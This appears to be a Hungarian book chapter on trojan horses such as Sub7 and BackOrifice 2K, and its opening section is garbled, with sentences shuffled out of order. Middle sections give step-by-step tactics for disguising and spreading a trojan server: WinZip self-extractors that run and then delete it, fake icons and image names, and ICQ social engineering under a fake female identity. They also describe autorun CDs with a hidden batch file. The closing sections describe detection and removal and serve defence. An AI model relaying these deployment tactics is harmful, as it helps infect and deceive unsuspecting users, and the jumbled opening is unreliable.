legkönnyebben úgy lehet megkaparintani az aktuális IP-t. Az egyik legismertebb eset egy trójai elrejtése a Linux SÁTÁN 1. és irányítani lehet azt. A komplex trójai programok. automatikus értesítést adnak. DOS parancssor-ra váltunk. Már csak az kell. dinamikus IP-címet kap. A trójaik lehetnek programba integrálva vagy fájlokhoz fűzve (erről később többet). ha nincs fennálló közveden online-kapcsolat. amelyen a SÁTÁN 1. Ezzel a programmal tud akciókat kiváltani a szerverrel a számítógépek között fennálló kapcsolaton keresztül. A szerver futtatása általában két lépésből áll. módosította a main()-funkcókat. az e-mail mellékleteket. amelyeket a kliens el tud indítani. az IP-keresés viszonylag egyszerű.0 forráskódja volt. de nem leéli feltétlenül annak lennie. amellyel meghatározott IP-tartományokat lehet tapogatni. amelyeket később még bemutatunk.0 programkódjában. választják. mert nem lehet tudni. és megkapja a támadáshoz szükséges IP-címet. hogy a hackerek nem csak az ismert módokat.2. hogy az áldozataikhoz jussanak.Az elhelyezésre a hackereknek és az ilyen eszközök programozóinak is rengeteg ötletük van. az a felhasznált szoftvertől függ. válogatás nélkül címeket szkennelni.3 Hogyan szerzik meg a hackerek az IP-t? A trójai használatához tehát szükség van a fertőzött számítógép IP-jére. Ez az eset is mutatja. ha mondjuk átvitel közben IRC-n vagy ICQ-n keresztül.2. hogy a SÁTÁN indításakor a jelszófájlba egy bejegyzés került. Amint a fertőzött számítógép kapcsolatba lép a hálózat- . Ez a lépés többnyire az elhelyezéssel egybekötve történik. de kártékonyak is (adatok törlése) vagy kémkedők (adatok átadása). és ha igen. Ez így nagyon egyszerűen hangzik. A kliens ehhez célzottan a fertőzött számítógép IP-címén szólítja meg a szervert. mint a CD-ROM-meghajtó nyitása. ha a fertőzött számítógép a hálózatra. milyen IP cím alatt. Egy programozó hozzáfért egy fejlesztői géphez. Szerencsére a programozás nagyon hibás volt. A második lépésben el kell érni. Csak ezután lehet célzottan megszólítani.2 A kliens otthon marad. majd telepítem és konfigurálni kell a szervert a rendszeren. zel a kliens az idegen számítógép irányítócentruma lesz. A különböző trójaiak leírása a továbbiakban következik. Mivel a legtöbb felhasználó szolgáltatón keresztül létesít internetkapcsolatot.n. Először is aktiválni. Ezután igen könnyű kiolvasni remote címekből a trójai szerver IP-jét. És már meg is lehet fogni a klienssel egy fertőzött számítógép szerverét. amellyel egy új felhasználót jegyzett be. így nem keletkeztek jelentősebb károk. Ez megnehezíti a trójai szerver elérését. Az akciók lehetnek viszonylag ártalmatlanok. Hogy a kliens milyen funkciókat tud vezérelni. és vezérli a szervert Ha egy trójai távirányítási funkciókat kínál. hogy maga a hacker is online legyen a megfelelő időben. 4.

Ezek arra valók. illetve az internettel." 4. inkább más utakat választanak. 4. így tud a hacker célzottan rajtaütni a fertőzött számítógépen. A szerver fájlokhoz fűzése a következő előnnyel jár: ki lehet indulni abból. amennyiben az éppen online van. A run command after unzipping parancs az archívból történő kicsomagolás után azonnal elindítja a szervert. amire szükséged van.) együtt csomagolják össze a szervert. különösen alkalmasak az animációk és a gag-programok. A veszélyes kis programok terjesztésére a legkülönbözőbb lehetőségeket agyalták ki a programozók. ha az áldozatot valóban meg akarjuk téveszteni egy fájllal. akkor nem rossz. Az archív ártalmatlan önkicsomagoló fájllá változik. A következőkben nemcsak az egyszerű álcázásokkal ismerkedünk meg. Ez akkor célszerű. pl. mert ez a sikeres telepítés után azonnal törli a szervert. PC-felhasználóként mindenesetre ismernünk kell ezeket. a WinZip-nek a programbeállításait is használják egyes hackerek.1 A trójaiakat fájlokba integrálják A szervert össze lehet kötni különböző fájlokkal. mint például a Sub7-nek. és máris van egy tökéletesen álcázott trójai. Egyes trójai kiteknek. Ha már így elterjeszted a szervert a nép körében. A trójaiak minden esetben veszélyesek. hogy értesítsenek. egy Defcon4 nevű hackercsoport (csak csekély mértékben módosított) szövegét fogjuk használni. azt persze nem kell elmondani. Tedd fel hasznos programként a honlapodra. sőt még a szerver ikonját is meg lehet változtatni. Ezután a melt server after installation szerver opció segít. és más fájlokkal (képek stb. hogy kínálja a honlapján. és mail-ben vagy ICQ-n keresztül üzenetet küldjenek neked. amelyben bizonyos információkat kapsz az áldozatról és számítógépéről.tál.3. A stratégiák egy része valóban profinak is mondható. amelybe a szerver be van ágyazva. .GiF. A hobby-hackerek. Erről az internet idevágó fórumain olyan rengeteg információ gyűlt össze. a szerver átküldi az aktuális IP-t a kliensnek. . Ilyenkor egy új WinZip archívot készítenek. Ehhez minden ikon felhasználható. ha megfelelő értesítőfunkciókkal rendelkező trójait használsz. mert annak a szándékait uralják. hogy az áldozat nem fogja gyanúsnak találni vagy rossz szándékot feltételezni arról a programról vagy a képről. Ezeket mindenki szívesen küldi és nézegeti. vagy be lehet építeni segédprogramokba. hogy az áldozat mit kíván. hogy abból már igazi „gyűjtemény" áll össze. így a vélt DOC fájlok egy megnyugtató Winword ikont tudnak prezentálni. hogy bekösd a szervert. pl. hanem a hobby-hackerek eljárásaiba is betekintünk. tehát EXE fájlokba. míg mások inkább csak a hobby-hackerek eszközei közé sorolhatók. amint az áldozat online van. vagy mail-ben küldi el az aktuális IP-t. vagy kérj meg egy baráti webmestert. amelyekkel a legkülönbözőbb fájlokkal lehet öszszekötni a konfigurált szervert. hogy trójait rejtettél bele. amelyeket a programok egyébként is használnak: a képek JPEG fájlként megtévesztőén hasonlítanak az eredetire. 4. JPG. Hogy egy pillantást vethessünk a dolgok menetére. hogy könnyen és gyorsan tudják terjeszteni. Képnek álcázzuk (valami nem gyereknek való mindig jól jön) vagy toolnak. aki a szervert vezérli. amelybe a szervert ágyazzák.2 Álcázás a WinZip-pel A trójai ügyes elhelyezéséhez a világ leggyakrabban használt tömörítő programjának. attól függően. Ikon-kiosztás a szervernek Olyan programnak. ICQ-n vagy IRC-n keresztül küldjük.3 így álcázzák és terjesztik a trójaiakat Ehhez a hálón nagyon sok program áll rendelkezésre. tehát képekkel. ha hiányoznak a programozási ismereteik. az IP-t. „A szervert mail-ekén. olyan funkcióik vannak speciális konfigurációs fájlokban (Editserver). A profik például más programokba integrálják a trójaiakat.3.

Férfi áldozatokhoz általában a női identitás az ideális. amely egy trójaira utal . mint egy nagyobb kép). anélkül. Álcázás az ICQ-val Ha lehet. hogy az áldozat észreveszi a támadást. ez így megy (megint a Defcon4 „információi" szerint): Először begyűjtünk minden eszközt. Egy Autorun. Az áldozatot persze nem kényszerítjük.exe nek nevezünk el. A hacker ráér A szervert általában nem az első kapcsolatfelvételnél küldjük el az ICQ-n keresztül. hogy egy fájl mögött vírus vagy trójai rejtőzik. amilyen például a The Thing. Ezt többnyire a közeli környezetben található célok megtámadásához választják. mint hacker meg hasonlók garantáltan nem fordulnak elő.jpg jelenik meg. hogy elfogadja a fájlt. az könnyen kiszámolhatja magának. ha ez a funkció nálunk nincs aktiválva (az IP-ről és kiosztásáról lásd az alapismeretekről szóló fejezetet). és ez nem különösebben feltűnő. „Ha az áldozat tényleg gyanítja. hiszen a kontaktlistát a beleegyezése nélkül bővítették. A The Thing egy kis trójai. Sokkal jobb.3. ez a trójai túl kicsi ahhoz. Ha a fájl küldéséhez az ICQ-t használjuk. és aztán egy nagyon kicsi fájllal megpróbálkozni. Tehát akinek van egy kis tapasztalata. amelyek az ICQ-nak köszönhetően adódnak a hackereknek. Ezen kívül az infóban minden személy IP-jét megmutatja. átvitelkor csak a photo. Ekkor reális az esélye annak. akkor amilyen jól csak lehet. A The Thing ezzel szemben csak kb. A legjobb. Ha a fájlt visszautasítja az ICQ-n keresztül. Ezek az alábbiak lennének: • A Sub7 trójai (magyarázat 1. Mint már mondtuk. még mindig el lehet neki küldeni egy pár nappal később egy anonim mail-fiókról. Az ICQ Auto-Authorize/IP-Unhider-Patch megengedi UIN-ek hozzáfűzését a saját kontaktlistához. egyszerűen várni kell pár napot.inf fájlt. amelyen át más fájlokat lehet feltölteni és végrehajtani. Ha egy fájlt photo.jpg. valamit fecsegni. hogy feltűnjön. ha generálunk egy új ICQ-UIN-t (a MICQ-val többel is online lehetünk egyszerre)." 4. hogy a másiknak ehhez engedélyt kellene adnia. Nos. 40 Kbájt (nagyjából annyi. amelyben olyan fogalmak. Ilyen eset- ben már csak ártatlan kifogások segítenek. Ehhez egy program vagy egy játék kalózmásolatát használja a hacker. Egy pár nap múlva azután már sokkal kisebb feltűnést kelt bármilyen állomány. a régebbi ICQ-verziók egy kis búgját is kihasználhatjuk: ezek általában nem mutatják meg a fájlvégződéseket. ha kezdetnek elküldünk egy pár tiszta fájlt.4 Elég egy CD és az automatikus lejátszás funkció A trójai kihelyezésének egyik kedvelt módja a CD-n keresztüli terjesztés. akkor is. Megkeressük az áldozatot a trójai terjesztéséhez.inf szövege. amire szükségünk lesz. lent) • MICQ (többször elindítja az ICQ-t) • ICQ-AutoAuthorize/IP-Unhider Patch • The Thing (kis trójai) A MICQ egy program.4.3 A trójaiakat az ICQ-val is tovább lehet adni Ön is kedveli ezt a kényelmes kommunikációs szolgáltatást az interneten? Van már egy listája kedvelt „beszélgetőpartnereiről"? Akkor valószínűleg érdekelni fogják azok a lehetőségek. hogy mi rejtőzik egy ilyen fájl mögött. Ezzel egyidejűleg lehet online két vagy több UIN. A CD-ROM-on megváltoztatja az Autorun.3. és hozzáfűzzük a kontaktlistához. A legtöbb trójai a sok szolgáltatás miatt már eleve akár 400 Kbájt is lehet. Amint ez a fájl az áldozat gépén egyszer lefutott. megnyílik egy hátsó kapu. álcázzuk a saját identitásunkat. amely lehetővé teszi az ICQ több példányának a párhuzamos indítását.

Az @echo parancs szolgál arra. anélkül. És mostanra már tudják. Most az editorral készít egy batch-fájlt (kötegelt parancsfájlt) a lemez főkönyvtárában.bat-ot. A Film Data mappába másolja a tulajdonképpeni filmet (*. és a szerver automatikusan elindul a játék bevezetőjével együtt. és erre. Persze azért ez a motívum sem zárható ki.bat néven menti. Ha ezt a lemezt most megkapja a felhasználó.MPEG fájlt).Az alapelv a következő: a felhasználó beteszi a CD-ROM-ot a meghajtójába. hogy a user előtt ne jelenjen meg a futtatás DOS-ablakban. és támadhatóvá teszi az áldozatot. 4. Addig pedig a terv még csődöt is mondhat. Emellett természetesen terjesztési stratégiát is kell fejleszteni. egy vírus végülis sokkal sikeresebb. hogy a levelezési címlisták minden címére elküldik magukat. amelynél fontosabb a hozzáférés. milyen stratégiákkal tudja egy hacker célzottan megközelíteni az áldozatát. A trójai tulajdonképpen minden esetben olyan támadási technikát jelent. Ez utóbbinál nem kell célzott támadásokkal és hasonlókkal bajlódnia a hackernek. és elindítja a Film. az internet-kapcsolat . Ebben a két esetben más késztetések vannak a háttérben.x automatikus lejátszás funkcióját használja ki a hacker. de ha belegondolunk. hogy célzottan jelszavakat vagy hasonlókat kutasson ki. Egy trójait gyorsan nagy számban elhelyezni nemcsak ideális álcázást kíván . A közvetlen kapcsolatok az ICQ-n keresztül elsősorban a közelebbi és a távolabbi ismerősök területén könnyítik meg a terjesztést. amelynek például Film a neve. mint a rombolás.7 Mit csinálnak a hobby-hackerek a trójaiakkal? A kérdés az első hallásra figyelemreméltóan hangzik. mint azt majd a következő fejezet mutatja.3. Ebben a mappában létrehoz még két további mappát. mert a hordozó csak a tartalma révén (játék. alkalmasabbak a vírusok. mind a kiértékelés/felhasználás szempontjából sokkal ráfordítás-igényesebbek. Egy nagy számban kihelyezett trójaiból beérkező adatokat természetesen ki is kell értékelni. a másiké Xxdata. amelyek magas rákattintási és ezzel installálási arányt garantálnak. Esetünkben tehát a szervert is. Ez egy CD-ROM felismerése után azonnal kiértékeli a megfelelő Autorun. de ha csupán a nagy mértékű pusztítás a cél.inf fájl adatait és végrehajtja a fájlt. Fontosabbak a hálózati hozzáférési jelszavak stb.6 További terjesztési stratégiák A trójaiak terjesztésének különböző stratégiái immár világossá váltak. A terjesztés CD-n keresztül is inkább a hobby-hackereknek való. 4. hanem egyszerűen az időfaktorra (dátumvezérlés) vagy a használati gyakoriságra (a rombolás x fájlindítás után indul) épít. 4. és ekkor a következőképpen működik. amely lehetővé teszi az elhelyezést világszerte több ezernyi számítógépen. Az olcsó szörfözésre utaló jelszavak viszonylag érdektelenek. hogy észrevehető lenne.3. Természetesen egy trójaival jelentős károkat lehet okozni.AVI vagy *. A hacker létrehoz egy mappát a lemezen. Ezzel szemben egy letöltésre kínált anyagot először fáradságosán ismertté kell tenni. amelyek úgy szaporodnak. mielőtt a megfelelő számú kihelyezés megtörténhetne. mert nem minden trójai kínál valóban érdekes adatokat a hackereknek. a másik Xxdata mappába másolja a szervert. feltört program stb. Ehhez a Windows 9.a Kurnyikova-vírus jó példa a sikert ígérő környezetekre.3. A talán legfontosabb és legsikeresebb eljárás a letöltésre kínált anyagokkal és a vírusokkal való terjesztés. de technikailag nem elég képzett ahhoz.5 A lemezek majdnem ugyanígy működnek Ez az alapelv a lemezekre is átvihető. A batch-fájl elindítja a szervert anonimitása védi a tettest.) válik igazán vonzóvá. mert az ilyen tömeges fertőzések mind a tervezés. a trójai is elindul. és Film. Az adatok azonnali tönkretétele inkább személyes ellenségeskedésből fakad. Ez a legegyszerűbben férgekkel (warm) érhető el. a legtöbb ember ugyan kíváncsi. az egyik neve mondjuk Film Data.

A távkarbantartó szoftver.. egy Mobman álnéven működő programozó „válaszaként" a NetBusra és a BackOrifice-vz. az interneten található „szabályokból" is láthatjuk. 1999 márciusában került a hálóra az első verziókban. ha fontos adatokat veszítünk el. amint azt a következő. nem?" Önfertőzés ügyetleneknek Azoknak a hobby-hackereknek. amelyek „több mint elég" fertőzött rendszert jelentenek. A Sub7 a legkomolyabb és a neten legelterjedtebb trójaiak közé tartozik. Destruktív módon felhasználva. hogy valójában mit is akarnak kezdeni az áldozat gépén. illetve hogy még most is az. a következő tanácsot tartja készenlétben az internet: „Ha az ember az első fertőzési kísérleteknél saját magát fertőzi meg. Először túrd át pár napig az áldozat gépét.0.exe-t. megváltoztathatnád a startlapját.1 Támad a Sub7 A Sub7 tágabb értelemben egyfajta távkarbantartó programhoz hasonlítható. hogy a megfelelő kliens tulajdonosa minden olyan funkciót végrehajthat a fertőzött gépen. azt az úgynevezett portszkennek mutatják.01!). és tovább tanulmányozhatnád a trójai sok funkcióját. akkor egyszerűen kliensként összeköttetésbe lép saját magával (a saját gép IP-je mindig 127. Legyetek szívesek. elsőként töröljük a C. egy backdoor-trójai. Általában kíváncsiság és egy adag vandalizmus rejtőzik a háttérben. Hogy világszerte milyen sok rendszer volt Sub7-tel fertőzött. ne nagyon bántsátok az áldozat adatait. akik csak úgy kísérletezgetnek egy kicsit ezzel. mint a Sub7. Áthelyezhetnél fájlokat. egy ilyen szoftverrel a teljes ellenőrzést át lehet venni egy fertőzött számítógép felett. azaz a remote access tool vagy remote administration tool. Én személy szerint teljes mértékben az adatmegsemmisítés ellen vagyok. \windows\netstat. fogja. több fájlból áll.4 Sub7 . Azóta ez a backdoor-tool folyamatosan tökéletesedik és új funkciókkal bővül. Ismert remote access program pl. hogy az már nem túl vidám dolog. amit a gép tulajdonosa is megtehet. és törli a szervert!" Pillanatkép egy trójairól 4.. .A legtöbben azonban. „Ha sok fantáziával és több ICQ-UIN-nal végre sikerült egy trójait elültetnünk az áldozat számítógépén. Ez azt jelenti.egy trójai rémisztő lehetőségekkel A Sub7. akik kísérletezés közben saját magukat fertőzik meg trójaival. 4. a PCAnywher a Symantectől. tulajdonképpen nem is tudják. nem kell mindjárt nekikezdeni a mulatságnak. és nézd meg az összes adatát. nagyobb hálózatokban. információkat fűzhetnél dokumentumokhoz. Mindannyian tudjuk. a rendszergazdák távkarbantartó és konfigurációs munkáját könnyíti meg a hálózatba kötött számítógépeken. amelyek egymáshoz kapcsolódva gondoskodnak a támadó gép és a fertőzött gép kapcsolatáról.4. Ezzel a Windows programmal viszont minden hálózati kapcsolatot meg lehet nézni.azért ez förtelmes lenne. Az egyes funkciók későbbiekben történő említése bizonyosan hozzá fog járulni az ilyen szoftverből eredő potenciális veszélyek felméréséhez. Egy olyan trójai. Amint hozzáférünk az áldozat adataihoz.

hogy miként telepítse magát a célgépre a szerver. bár azt nem ismerték el. így például a magasfokú titkosítással. és hogy a felhasznált port rejtve legyen-e. amelyről a trójai kommunikál (az újabb verziókban véletlenszerű is lehet . Las Vegasban. hogy a műveleti konzolok (kliens) között kapcsolatot teremtsen. hanem kizárólag dokumentált Windows funkcióhívásokat. amellyel a szervert lehet konfigurálni. hogy a trójai egyes funkcióit inicializálja. Ennek a modulnak tehát feltétlenül telepítve kell lennie az irányítandó rendszerre ahhoz. Egy ügyesen programozott kliens/szerver alkalmazásról volt szó. És ehhez a program nem a Windows operációs rendszer valamiféle búgjait vagy belső dokumentálatlan API-jeit használja. A Sub7-nek kapcsolata van a szerverre! így előkészítve sokféleképpen közelíti meg a támadó az áldozatát. hogy Windows 9x alatt biztonsági problémák lennének. Edit-Server Az Edit-Server egy kiegészítő program. és megkísérli a célrendszerre telepíteni a szervert. A CDC ezzel a verzióval „trójainak" kikiáltott programjának a hírén akart javítani. A 2000-ben a Cult of the Dead Cow (CDC) kihozta a BackOrifice új verzióját: a BO2K-t. hogy az átvitt adatok egy harmadikhoz kerüljenek. amelyekről egészen kényelmesen el lehet indítani az egyes funkciókat. A BackOrifice célja . A hackereket azonban ezek a dolgok nem nagyon érdekelhették. hogy Sub7-es fertőzöttségről lehessen beszélni. és hogy egy másik futtatható fájlhoz kapcsolódjon-e. menükkel és kiválasztómezőkkel.A Sub7 szervere A szerver ahhoz szükséges. gombokkal. és irányítsa a fertőzött gépet. Ugyanezen év augusztus 7-ig a programot több mint 35 ezerszer töltötték le a CDC honlapjáról. A klienst teljesen hagyományos Windows-programként kell elképzelni. A Microsoft válasza nem váratott magára sokáig. 4.a Windows 95/98 alatti súlyos biztonsági hiányosságok feltárása. UIM-kicsomagolás).állította a hackercsoport . . a port. Azt is meg lehet adni.itt a port a futási időben derül ki). Különösen ennek kellett a BO2K-t érdekessé tenni a hálózati rendszergazdák számára. amely csaknem lehetetlenné teszi. mert a BackOrifice ezután is az egyik legkedveltebb trójai maradt. Ehhez jönnek egyes ICQ-beállítások (értesítés. hogy a szerver közvetlenül a telepítés után azonnal elinduljon-e. jelszókikémlelés. és ezzel irányítóközpontként működhessen. amely trójai falóként észrevétlenül tudott futni egy Windows 9x operációs rendszeren. Itt lehet például rögzíteni. továbbá itt lehet meghatározni a szerver nevét is. grafikus felülettel.5 BackOrifice 2K . augusztus elején mutatta be a texasi Cult of the Dead Cow hackercsoport a BackOrifice Windows Remote Administration Tool-t egy hackertalálkozón.Hálózati eszköz vagy támadás a Microsoft ellen 1998. Pillantás a Sub7 váltóközpontjára Minden működést a kliens irányít A kliensre azért van szükség. és új képességekkel bővítette. hogy az a szervert az installáció előtt elrejtse.

hogy fájlokat lehessen kicserélni.exe Funkció Ez a szerver. illetve a Registry-be. hogy különösebb ismeretekre lenne szükség róla. és ez a vírusvizsgálónak jelentős problémákat okozhat. hogy a Minden fájl ellenőrzése vagy hasonló funkció aktív legyen. . anélkül. hogy minden Windows-indításkor automatikusan aktiválódjon. Ez a plugin gondoskodik arról. hogy ez állandóan aktualizálva legyen. Mobman például beépített egy ilyen funkciót a Sub7-be. Hogy az ilyen esetekben mit tehetünk. 4. hogy a szkenner ne törölje azonnal a fertőzött fájlokat. Mielőtt a kliens a szerverrel kapcsolatba tudna lépni. A szervert kiegészítő részekkel (pluginek) még bővíteni lehet. Ha a vírusvizsgáló fertőzést talál.6.mint mondtuk . mert a szkennelés így túl sokáig tarthat. Először .6 így ismerjük fel a trójait a rendszerünkben Most. A grafikus felhasználói felületen keresztül lehet a fertőzött PC-t távirányítani. Próbáljuk meg a fájlokat izolálni.és megtévesztheti a víruskeresőt. mivel az ilyen programok keresése gyakran beavatkozásokat igényel a rendszerbe. Fájl bo2k. hogy az adatok kódoltan közlekedjenek a kliens és a szerver között. Ha a szerver csak egyszer is elindul. A gyakorlatlan felhasználónak ez nehéznek tűnhet. Ha a vírusvizsgáló nem talál fertőzött fájlokat. a megtisztítás különböző lehetőségeit fogja javasolni. néhány dolgot még be kell állítani rajta (jelszó stb. hogy a trójai falovak bevetésének a lehetőségei és potenciális veszélyei ismertté váltak. Vannak azonban olyan programok. automatikusan a C:\Windows\System könyvtárba másolja magát. de ez kódolja a TCP-csomagok headerét.tekintsünk el az érintett fájlok törlésétől. hogy a rendszer használhatatlanná válik . a szerver neve. a Rattler mailben elküldi az áldozat IP-jét. A trójaiak leküzdésének most következő módjánál nagyon óvatosnak kell lennünk. port. így ezeket nem lehet BO2Kadatforgalomként (Traffic) felismerni. amelyen a szerver és a kliens összekapcsolódnak.dll io_stcpio. és kisebb bővítéseket (pluginek) hozzáfűzni.exe A kliens a BO2K „látható" része.5. Ez a plugin az első pillantásra ugyan nem nyújt új lehetőségeket. Az IP (ez a címe egy PC-nek az interneten) is szükséges a kliens és a szerver öszbo2kcfg. Arra is figyelnünk kell. Ezért szeretnék itt néhány lehetőséget bemutatni. hogyan lehet felismerni és leküzdeni egy rendszerben a trójai vírusokat. az még messze nem jelenti azt.4. Ha elindul. amelyen a rendszerkönyvtárba másolódik stb.vagy jobban mondva: a gép totál lefagy. A BO2K legfontosabb fájljaihoz jön még néhány plugin: Fájl bo2k_inetcmd.).dll enc_serpent. felmerül a kérdés.) végezni a szerveren.dll Funkció Lényegében ezek a szerver alapfunkciói. hiszen szinte naponta fedeznek fel új trójaiakat.dll B02K pluginek Ez a plugin látja el az értesítési funkciókat: ha a szerver elindult.1 Vírus.1 A BO2K és összetevői íme egy áttekintés a legfontosabb fájlokról és funkcióikról a távkarbantartási funkciók és a trójai működés komplex együttműködésében. Fájlok és funkcióik együttműködése 4. azt a következő szakasz részletezi. a gép már megfertőződött. Továbbá feltétlenül szükséges. Az első vizsgálat előtt figyeljünk arra. srv_rattler. hogy elkerüljük az esetleges károkat. hogy a számítógép tiszta. Ha nem vagyunk biztosak magunkban.és trójai-szkenner Alapvetően minden rendszerben mindig kell telepített vírusvizsgálónak lennie. A trójai rejtőzködhet . inkább kérjünk tanácsot szakembertől. bo2kgui. Ezt a gyártók gyakran nem állítják be előzetesen.exe szekötéséhez. mert egyes trójaiak szerzői biztonsági intézkedéseket építettek a programjaikba az eltávolításnak e módja ellen. A Registry-be is bejegyzi magát úgy. amelyek jelentősen megkönnyítik a standard trójaiak felkutatását. illetve karanténba tenni. Ezzel a programmal lehet fontos beállításokat (kódolás. nem vagyunk-e már magunk is fertőzöttek. A SERPENT feladata. Sőt bizonyos esetekben még ahhoz is vezethet.

amelyek ezt az utat használnák. aztán a Futtatás-ra. amelyet az utolsó rendszerindítás előtt töröltek. De persze a parancsokat többnyire rengeteg üres karakterrel álcázzák a paraméter-megnevezések mögött.3 Windows Registry . hogy ne legyenek rögtön láthatóak. . ha a rendszerindítással együtt elindul.csak a szokatlan eszközmeghajtók veszélyesek Néhány ritka trójai a Windows 95/98-s rendszerek eszköz-meghajtójaként is álcázza magát. Itt aztán szokatlan dolgok után kell kutatni.4. Több ablak is megnyílik szövegszerkesztő formában. ezt semmiképpen se töröljük! Az Explorer. írjuk be a Start/Futtatásba a sysedit. Járjunk el úgy. vírusvizsgálók. ez rendszerint azt jelenti: egy parancssor egy fájl másolását írja elő. mint a Win. az illető ikonra duplán kattintva érjük el őket. a mappát a felhasználói profilokon keresztül lehet megtalálni (C:\WinNT\Profiles\ Username \Startmenü\Programok \Indítópult). Ez azt jelenti.exe után azonban még további bejegyzések következhetnek. hát megemlítjük.exe-t. Autostart (Indítópult)-mappa . Az Indítópultot a következőképpen lehet ellenőrizni: közvetlenül a Start menüből: Start Programok Indítópult vagy C:\Windows\Startmenu\ProgramokMndítópult. de persze ezeket (szerencsére) csak ritkán használják a trójaiak. Óvatosan! Itt már van egy Explorer.exe-vel lehet megnézni és szerkeszteni. és kényelmesen megváltoztathatunk.) is használja.ini bejegyzésein keresztül indítani a trójaiakat.6. mert nagyon nagy a felfedezés valószínűsége.ini .bat vagy control. helyette azonban ezt írjuk be: sysedit. System. Nézzük meg a Load és a Run paraméterek mögötti bejegyzéseket. A Win. de nagyon ritka Ha a winstart. Hogy ezt kizárjuk. 4.sys szintén a sysedit. amelyeket nem ismerünk. Ezeket a trójaiakat azonban nehéz realizálni.ini-t ugyanúgy nyitjuk meg szerkesztésre. backup programok stb. Ezzel a programmal a fent nevezett bejegyzések közül sokat ellenőrizhetünk.2 AutoRun bejegyzések Egy trójai csak akkor működik. míg a sor végét is látjuk.ini-t.ini a Windows 3.ini . mint a Windows NT.ez már izgalmas A regisztrációs adatbázisban megnevezett útvonalak mappákként jelennek meg.de ez is nagyon ritka. mielőtt bármit is törölnénk.6.exe nevű bejegyzés. A sysedit-tel is sokat megtalálhatunk a fentiek közül. Mivel azonban ez a lehetőség is adott. hogy online kapcsolat esetén kész legyen parancsokat fogadni a klienstől. és egy trójait indíthatnának el. uninstallprogramok.DOS-os hulladék. Ez az indítási lehetőség azonban nagyon valószínűtlen. Gördítsük az alsó gördítősávot egyszerűen jobbra.bat-ot is a sysedit. Szükség esetén távolítsuk el a gyanús bejegyzéseket. winstart.ini-ben is el lehet helyezni egy bejegyzést az automatikus indítás céljából.bat-ban felismerhető egy bejegyzés. Az autoexec. mert ide is bejegyzi magát néhány ártalmatlan program.bat . illetve parancsikonokat kell törölni. Az indulásnak ezt a lehetőségét a rendszerindítással együtt sok ártalmatlan program (pl.kevésbé valószínű Klasszikus változat az automatikusan indítandó programok indítására az autostart (Indítópult)-mappa.exe-vel lelhető fel.elég ritka Ebben a fájlban a shell= paraméter alatt fordulhat elő bejegyzés. de a trójaiak is. A config. és írjuk be msconfig. Az olyan rendszereknél. A control. Itt megintcsak ajánlatos az óvatosság. Menjünk egyszerűen a Start gombra.sys . mint az msconfig-nál. kis rizikófaktorral Itt is óvatosnak kell lenni a törléssel.lehetséges. A trójaiak ritkán használják ezt a lehetőséget.x-es időkben volt érdekes Régebben nagyon kedvelt módszer volt a Win. Eddig alig ismertek olyan trójaiak. config. és esetleg programokat. Számos más Registry-bejegyzési lehetőség is előfordul autorun célból. Hasznos segítség a Windows saját msconfig programja is. autoexec. hogy a szervernek a rendszer hátterében állandóan futnia kell. A System. és szerencsére nagyon ritkák is.

Itt is egy Registry-be került bejegyzést keresünk.Következőként hívjuk meg a Rendszerleíró adatbázis-szerkesztőt a Start/Futtatás/Regedit-tel. Ilyen esetben nem egyszerű a pontos azonosítás. Ezek közül csak néhány útvonal érdekes: A „%1" %*" karakterek elé be lehetne írni még egy programot. Rendszerint azonban csak az itt megnevezett bejegyzések vannak. eszközmeghajtónak is álcázhatja magát. Eszközmeghajtónak álcázás Egy trójai. a shell paraméterrel. Gyanú esetén ne az egész bejegyzést távolítsuk el. hanem csak a program nevét! ICQ-usereknél fennáll egy további lehetőség a következő bejegyzésnél: Registry Installed Components Vannak még az úgynevezett „Unknown-módszerek". Megnyílik egy program félelmetesen sok bejegyzéssel. Itt is a Windows Registryt használják a program automatikus indításához. mint már említettük. aminek a törlése rendszerproblémákat okoz. Végülis lehet az egy valódi meghajtó is. amögött egy trójai rejtőzhet. illetve a Windows-regisztráció. azonban egy „szokatlan" path-on: . Ha valamelyik kulcs még egy futtatható fájlt is tartalmaz. Ezek alatt az útvonalak alatt a következő bejegyzések találhatók: Registry Common Startup kulcs A bejegyzés általában Ez alatt az útvonal alatt található a szerver is.

exe (C:\windows\) elindulna. amely a C:\windows\system könyvtárban vagy máshol található. Az eredeti Windows runonce.0 trójai leírását. 4. hogy a „futó feladatokat" ellenőrizzük. Például a Ctrl+Alt+Del billentyűkkel. amelynek más a mérete. ami a Windows alatt adódik.exet futtatja le (kétséges esetben a C:\ könyvtárban). LEHET! Ennek a módszernek a további magyarázatához az angolul értők olvassák el a Schoolbus 2. amely így lehetővé tesz egy autorun eljárást.4 Módszerek az Explorer. Ezeket különböző módokon lehet megfigyelni. Ez a módszer azonban egyáltalán nem biztos.exe mérete a Windows 95 alatt 11264 bájt. Az explorer. és válasszuk a Mindent megmutat opciót.exe-t egy módosított fájlra cseréli. mert tényleg mindent könyörtelenül megmutat. „Futó folyamatok ellenőrzése" módszer Gyakran lepleződik le egy trójai úgy. Tehát ha találunk egy runonce. . amelyet a Taskmanager-rel együtt lehet elindítani. amelyeket ennek megfelelően be is lehet zárni. Megjelenik egy ablak. akkor itt is el lehet rejtve egy trójai. A Windows-zal azonban egy jó kis eszközt is kapunk a futó folyamatok ellenőrzéséhez. mert a legtöbb trójai „tudja".4. Menjünk a Nézet menüpontra.6. Az eredeti runonce. amely a http://serdarka. mielőtt a tulajdonképpeni explorer. Itt futtatható fájlokról van szó.exe kicserélése Csak a Schoolbm trójainál ismert. megtalált explorer. A Windows 2000-be is integráltak egy nagyon jó folyamat-nézőkét.5 A runonce. Kezdőknek azonban a DrWatson bonyolultnak tűnhet. Windows 98/ME alatt pedig 40960 bájt. A program elindul. A Start menü Futtatás-ba írjuk be: drwatson.exe-vel a C:\ meghajtóra Egy bug miatt a Windows először mindig az első. hogy kell elrejtőzni a Taskmanager elől.com/ weboldalon található. amelyek a rendszerrel „együtt futnak". Hangsúlyozzuk. és először elvégez néhány vizsgálatot.8m.exe-t. A program neve: DrWatson. hogy legközelebb egy trójai töltődik be.exe a C:\ -n azt eredményezhetné. amely mutatja a futó programokat.6.

